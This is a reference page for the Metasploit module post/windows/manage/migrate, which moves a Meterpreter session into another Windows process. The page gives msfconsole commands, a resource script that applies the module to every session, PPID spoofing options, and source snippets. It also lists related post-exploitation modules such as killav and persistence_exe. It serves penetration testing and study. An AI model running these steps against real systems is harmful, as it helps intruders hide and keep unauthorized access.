Windows Manage Process Migration - Metasploit
This page contains detailed information about how to use the post/windows/manage/migrate metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Source code: modules/post/windows/manage/migrate.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/manage/migrate
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/manage/migrate
msf post(migrate) > show options
... show and set options ...
msf post(migrate) > set SESSION session-id
msf post(migrate) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/manage/migrate")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the windows/manage/migrate post exploitation module looks in the msfconsole:
msf6 > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > show info
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Platform: Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez <[email protected]>
phra <https://iwantmore.pizza>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID 0 no PID of process to migrate to.
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
PPID_NAME no Name of process for PPID spoofing when creating a new process.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If set, notepad.exe is used.
Description:
This module will migrate a Meterpreter session from one process to
another. A given process PID to migrate to or the module can spawn
one and migrate to that newly spawned process.
Module Options
This is a complete list of options available in the windows/manage/migrate post exploitation module:
msf6 post(windows/manage/migrate) > show options
Module options (post/windows/manage/migrate):
Name Current Setting Required Description
---- --------------- -------- -----------
KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID 0 no PID of process to migrate to.
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
PPID_NAME no Name of process for PPID spoofing when creating a new process.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If set, notepad.exe is used.
Advanced Options
Here is a complete list of advanced options supported by the windows/manage/migrate post exploitation module:
msf6 post(windows/manage/migrate) > show advanced
Module advanced options (post/windows/manage/migrate):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/manage/migrate module can do:
msf6 post(windows/manage/migrate) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/manage/migrate post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/manage/migrate) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Process <TARGET_PID> not found
Here is a relevant code snippet related to the "Process <TARGET_PID> not found" error message:
56: elsif datastore['NAME'] and datastore['NAME'] != ""
57: target_pid = session.sys.process[datastore['NAME']]
58: end
59:
60: if not target_pid or not has_pid?(target_pid)
61: print_error("Process #{target_pid} not found")
62: return
63: end
64:
65: begin
66: print_status("Migrating into #{target_pid}")
Could not migrate into process
Here is a relevant code snippet related to the "Could not migrate into process" error message:
65: begin
66: print_status("Migrating into #{target_pid}")
67: session.core.migrate(target_pid)
68: print_good("Successfully migrated into process #{target_pid}")
69: rescue ::Exception => e
70: print_error("Could not migrate into process")
71: print_error("Exception: #{e.class} : #{e}")
72: end
73:
74: if datastore['KILL']
75: print_status("Killing original process with PID #{original_pid}")
Exception: <E.CLASS> : <E>
Here is a relevant code snippet related to the "Exception: <E.CLASS> : <E>" error message:
66: print_status("Migrating into #{target_pid}")
67: session.core.migrate(target_pid)
68: print_good("Successfully migrated into process #{target_pid}")
69: rescue ::Exception => e
70: print_error("Could not migrate into process")
71: print_error("Exception: #{e.class} : #{e}")
72: end
73:
74: if datastore['KILL']
75: print_status("Killing original process with PID #{original_pid}")
76: if has_pid?(original_pid)
PID <ORIGINAL_PID> exited on its own
Here is a relevant code snippet related to the "PID <ORIGINAL_PID> exited on its own" error message:
75: print_status("Killing original process with PID #{original_pid}")
76: if has_pid?(original_pid)
77: session.sys.process.kill(original_pid)
78: print_good("Successfully killed process with PID #{original_pid}")
79: else
80: print_warning("PID #{original_pid} exited on its own")
81: end
82: end
83: end
84:
85: # Creates a temp notepad.exe to migrate to depending the architecture.
Process <TARGET_PPID> not found
Here is a relevant code snippet related to the "Process <TARGET_PPID> not found" error message:
88: cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)
89:
90: print_status("Spawning notepad.exe process to migrate into")
91:
92: if target_ppid != 0 and not has_pid?(target_ppid)
93: print_error("Process #{target_ppid} not found")
94: return
95: elsif has_pid?(target_ppid)
96: print_status("Spoofing PPID #{target_ppid}")
97: end
98:
Go back to menu.
Related Pull Requests
- #13054 Merged Pull Request: Fix #13053 - post/windows/manage/migrate & PPID_NAME
- #12736 Merged Pull Request: Add support for PPID spoofing
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #8110 Merged Pull Request: fix migrate by process name
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2535 Merged Pull Request: Fix bug #8502, used %PATH% for notepad invocation
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2049 Merged Pull Request: [SeeRM:#8123] - Pid check
- #1242 Merged Pull Request: Msftidy fixes
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #1104 Merged Pull Request: Fixed bugs in filezilla and migrate modules, and added retry code to smart_hashdump.
- #958 Merged Pull Request: Msftidy 2
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/manage/add_user
- post/windows/manage/archmigrate
- post/windows/manage/change_password
- post/windows/manage/clone_proxy_settings
- post/windows/manage/delete_user
- post/windows/manage/dell_memory_protect
- post/windows/manage/download_exec
- post/windows/manage/driver_loader
- post/windows/manage/enable_rdp
- post/windows/manage/enable_support_account
- post/windows/manage/exec_powershell
- post/windows/manage/execute_dotnet_assembly
- post/windows/manage/forward_pageant
- post/windows/manage/hashcarve
- post/windows/manage/ie_proxypac
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/install_python
- post/windows/manage/install_ssh
- post/windows/manage/killav
- post/windows/manage/mssql_local_auth_bypass
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
- post/windows/manage/peinjector
- post/windows/manage/persistence_exe
- post/windows/manage/portproxy
- post/windows/manage/pptp_tunnel
- post/windows/manage/priv_migrate
- post/windows/manage/pxeexploit
- post/windows/manage/reflective_dll_inject
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/windows/manage/rid_hijack
- post/windows/manage/rollback_defender_signatures
- post/windows/manage/rpcapd_start
- post/windows/manage/run_as
- post/windows/manage/run_as_psh
- post/windows/manage/sdel
- post/windows/manage/shellcode_inject
- post/windows/manage/sshkey_persistence
- post/windows/manage/sticky_keys
- post/windows/manage/vmdk_mount
- post/windows/manage/vss
- post/windows/manage/vss_create
- post/windows/manage/vss_list
- post/windows/manage/vss_mount
- post/windows/manage/vss_set_storage
- post/windows/manage/vss_storage
- post/windows/manage/wdigest_caching
- post/windows/manage/webcam
Authors
- Carlos Perez <carlos_perez[at]darkoperator.com>
- phra <https://iwantmore.pizza>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.